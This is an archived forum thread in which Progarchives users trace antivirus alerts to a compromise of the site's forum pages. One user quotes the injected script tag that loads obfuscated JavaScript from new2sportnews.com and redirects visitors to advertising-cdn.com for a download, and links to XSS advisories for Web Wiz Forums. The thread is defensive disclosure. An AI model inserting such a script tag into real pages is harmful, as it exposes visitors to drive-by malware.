Download denied
Printed From: Progarchives.com
Category: Site News, Newbies, Help and Improvements
Forum Name: Report bugs here
Forum Description: Help us improve the site from a tech standpoint
URL: http://www.progarchives.com/forum/forum_posts.asp?TID=129492
Printed Date: May 06 2024 at 12:09
Software Version: Web Wiz Forums 11.01 - http://www.webwizforums.com
Topic: Download denied
Posted By: I prophesy disaster
Subject: Download denied
Date Posted: August 07 2022 at 15:20
|
My security software is reporting "Download denied" every time I click on a link in PA Forums (but not PA Home). Further details on the report: Event: Download denied User: ****** User type: Active user Application name: msedge.exe Application path: C:\Program Files (x86)\Microsoft\Edge\Application Component: Web Anti-Virus Result description: Blocked Type: Probability of unauthorized software download Name: https://advertising-cdn.com/qPyGTw?return=js.client&&se_referrer=http://www.progarchives.com/&default_keyword=Progressive Rock Music Forum&landing_url=www.progarchives.com/forum/&name=_DGLzgLZ8nXkPCBxT&host=https://advertising-cdn.com/qPyGTw Threat level: High Object type: Web page Object name: qPyGTw Object path: https://advertising-cdn.com/qPyGTw?return=js.client&&se_referrer=http://www.progarchives.com/&default_keyword=Progressive Rock Music Forum&landing_url=www.progarchives.com/forum/&name=_DGLzgLZ8nXkPCBxT&host=https://advertising-cdn.com Reason: Cloud Protection ------------- No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man. |
Replies:
Posted By: I prophesy disaster
Date Posted: September 17 2022 at 15:19
|
It looks like this problem has finally been fixed (although more testing is needed to be sure). ------------- No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man. |
Posted By: I prophesy disaster
Date Posted: September 23 2022 at 10:04
The problem has returned.  ------------- No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man. |
Posted By: Cristi
Date Posted: September 23 2022 at 10:08
I've never seen such a thing happen.  Download denied? what download? Microsoft Edge is not a good browser IMO, even google chrome has gotten worse. Try Mozilla Firefox (although it collapsed for me once a few years back) and a new(er) browser called Brave. |
Posted By: I prophesy disaster
Date Posted: September 23 2022 at 10:26
That's the notification I get. I have no idea to what "download" is referring. I assume it's something that the https://advertising-cdn.com website is trying to download onto my computer.
I have four browsers on my computer, but I mostly use only two of them: Edge and Chrome. I use Edge for sites that keep me logged on, such as this site, and Chrome for things I'd rather clear my browser history, cookies, etc. I have Firefox but I don't like it. ------------- No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man. |
Cristi wrote:Posted By: Cristi
Date Posted: September 23 2022 at 10:33
| ^ it does not seem to be PA fault for what's going on there. I think your browser is stuck on some weird ads, trackers and the likes. |
Posted By: I prophesy disaster
Date Posted: September 23 2022 at 10:47
|
^ This is the only site where it happens. And there was another topic started by wiz_d_kidd reporting something similar: http://www.progarchives.com/forum/forum_posts.asp?TID=129510" rel="nofollow - Intrusion Detected from PA . That topic referred to the same website, but I think the difference might be due to different security software. It is the security software that is producing the notifications. ------------- No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man. |
Posted By: Cristi
Date Posted: September 23 2022 at 10:50
I had some problems a few months ago, but it was my antivirus that didn't let me see any album pages because of "phishing". I solved the problem but it took me a little while.
|
Posted By: I prophesy disaster
Date Posted: September 23 2022 at 11:08
|
^ This problem is only occurring on the forum pages, not on the database pages. But it does occur every time I click on any link in the forum. How did you solve your problem (if it isn't too involved to say)? ------------- No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man. |
Posted By: Cristi
Date Posted: September 23 2022 at 11:12
I played with the antivirus settings, trial and error. I got it right in the end. I don't use Google chrome for PA anymore.
|
Posted By: I prophesy disaster
Date Posted: September 23 2022 at 11:25
Actually, it does occur when I click on any of the "PROG SUB-GENRES" links. ------------- No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man. |
Posted By: I prophesy disaster
Date Posted: September 23 2022 at 11:32
|
^And the "PROG ROCK GUIDES" and "FAQ" links.
------------- No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man. |
Posted By: I prophesy disaster
Date Posted: September 23 2022 at 15:44
|
I just discovered something quite interesting: I have a VPN which I sometimes use and sometimes don't use, depending on what I'm doing. When I'm not using the VPN, I don't get the "Download denied" notification. But when I do use the VPN (server in Los Angeles), I get the notifications. I haven't yet tried the VPN server in other available locations, so I don't know if the problem is with the VPN or the location. ------------- No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man. |
Posted By: I prophesy disaster
Date Posted: September 23 2022 at 15:52
|
^ VPN server in London –> "Download denied" notification. VPN server in Sydney –> "Download denied" notification. So, it appears that the problem is with the VPN. ------------- No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man. |
Posted By: I prophesy disaster
Date Posted: September 24 2022 at 04:01
|
I should remark that it was only yesterday's "Download denied" notifications that were caused by the VPN. The original problem that lasted more than a month was not caused by the VPN. I don't use the VPN to visit this site and it was quite by accident without realising that it was still on that it was in use while I was visiting this site yesterday. ------------- No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man. |
Posted By: wiz_d_kidd
Date Posted: October 04 2022 at 10:49
|
It seems that many users, myself included, have had similar issues. I've spent considerable time digging into the source of the problem. The upshot is that ProgArchives appears to have been hacked! Back in August, I began getting warnings from Norton Antivirus about a malicious activity (i.e. intrusion detections) when I visit the "Forums", or "Prog Rock Guides" pages. But it doesn't happen on the "About Us" page, or the main page. The problem is that the HTML code for the Forums and Guides pages (and probably others) contains malicious javascript that looks like this: <script src="https://new2sportnews.com/progarchives.js" type="d597b4f971c3864a4c6a613f-text/javascript"></script> The referenced site, new2sportnews.com, has the appearance of the Nigerian version of The Guardian website. However, it is a bogus web site. It was created in Jan 2021 and had no content until Jun 2022, and the content (according to the internet's Wayback Machine) has not changed since then. The javascript that is stored at that site (i.e. https://new2sportnews.com/progarchives.js) and is being executed unconditionally by Progarchives, is highly obfuscated to hide its function. I ran it through an "unobfuscator" and confirmed that the script redirects the user to a site called "advertising-cdn.com" which attempts to download a file to the user's computer. The nature of the file is unknown. It could be password stealing, keystroke interception, or other nefarious functions. I also checked Progarchives using the Wayback Machine and determined that it was clean as of July 19th. Sometime after that is when the system was hacked. Users, myself included, began experiencing problems around Aug 7th. After an update to my Norton Antivirus, it started completely blocking my access to the forums because I couldn't stop it from executing the malicious javascript. I could disable javascript entirely, but then I could not post or vote in polls. My solution was to install the NoScript add-on to Firefox, and disable scripts specifically for new2sportnews.com. That seems to have worked, as least for now. The target site, advertising-cdn.com, which contains the dowloader script appeared to be a valid site at first, but now it is gone. The hackers could be working on a different attack. I've contacted PA admins through every means possible. Thanks to Ian (aka Nogbad the Bad) for forwarding private messages that I sent him on Progressive ears. I also contacted the site owners/admins thru GoDaddy, but so far no one has responded. I hope that our site admins fix this infection before its users are seriously attacked. There is no valid reason that the HTML code for this site should be executing a javascript on a bogus website! To check for yourself, look at the page source HTML (in Firefox right-click anywhere on a page and select "View Page Source"), then search for new2sportnews.com. If you find it, you've confirmed that the site has been hacked and can potentially cause serious harm to its users (if it hasn't already). ------------- “I don’t like country music, but I don’t mean to denigrate those who do. And for those who like country music, denigrate means to ‘put down.'” – Bob Newhart |
Posted By: chopper
Date Posted: October 05 2022 at 06:50
|
Wow, that is worrying, thanks for doing this. Do you know the name of the file that it attempts to download? My anti-virus is not picking anything up but, as you say, this could be a serious problem. It's a shame M@x no longer does anything with PA.
|
Posted By: chopper
Date Posted: October 05 2022 at 07:14
Edge developer tools are throwing up an error on that web page. I'm not an expert on this, but that suggests to me that the script is not being executed however that would be the case if the web site is not longer there, but it does leave PA open to future attacks, I would guess. |
Posted By: wiz_d_kidd
Date Posted: October 05 2022 at 10:12
|
The website
https://new2sportnews.com, and the script (progarchives.js) are still there, but that script invokes another script (of unknown name) at https://advertising-cdn.com which is now offline. I agree with you that they can relaunch a future attack with ease now that they have the "hooks" built into PA. This all smacks of a Reflected Cross-Site Scripting (XSS) attack, which is explained here: https://portswigger.net/web-security/cross-site-scripting ------------- “I don’t like country music, but I don’t mean to denigrate those who do. And for those who like country music, denigrate means to ‘put down.'” – Bob Newhart |
Posted By: chopper
Date Posted: October 05 2022 at 11:21
| Presumably this is a fairly simple code change to remove references to that script from the code? Can you tell which pages are impacted? |
Posted By: wiz_d_kidd
Date Posted: October 06 2022 at 06:42
|
I'm not sure how this website works, but the root infection might actually be in the code that generates and updates the pages your browser receives. Removing the bad script from the output pages might not fix the problem, if it gets added again then next time the page refreshes. So far, this is the status of the pages I'm aware of: Main - not infected Forums - infected Prog Rock Guides - infected Log In - not infected Prog Radios - not infected Prog Links - not infected FAQ - infected About Us - not infected The bad script occurs multiple times on some of these pages, not just once. ------------- “I don’t like country music, but I don’t mean to denigrate those who do. And for those who like country music, denigrate means to ‘put down.'” – Bob Newhart |
Posted By: wiz_d_kidd
Date Posted: October 06 2022 at 10:08
|
Apparently PA uses Web Wiz Forums software, version 11.01 (released 10 Sep 2014). The latest version is 12.05 (released 18 Jan 2022). I did a search for Web Wiz vulnerabilities, and found that many versions, beginning with v6.34 and extending thru v10.03, were identified as having vulnerability to cross-site scripting (XSS) attacks. That's a lot of versions for which they never fixed the problem, and it still might be present in v11.01. https://www.cvedetails.com/cve/CVE-2006-0175/ https://www.exploit-db.com/exploits/28589 https://vulmon.com/searchpage?q=web+wiz+forum https://www.nmmapper.com/st/exploitdetails/37678/36689/web-wiz-forums-multiple-cross-site-scripting-vulnerabilitiesdownload/ ------------- “I don’t like country music, but I don’t mean to denigrate those who do. And for those who like country music, denigrate means to ‘put down.'” – Bob Newhart |
Posted By: chopper
Date Posted: October 06 2022 at 12:13
|
PA is well behind in its version of the forum software but I don't suppose it's going to get upgraded any time soon since M@x seems to have abandoned it. I'm thinking PA is dying a slow death now, at some point the forum software will stop working (it's probably out of support now). |
Posted By: Nogbad_The_Bad
Date Posted: October 06 2022 at 12:29
|
That's what I'm watching. ------------- Ian Host of the Post-Avant Jazzcore Happy Hour on Progrock.com https://podcasts.progrock.com/post-avant-jazzcore-happy-hour/ |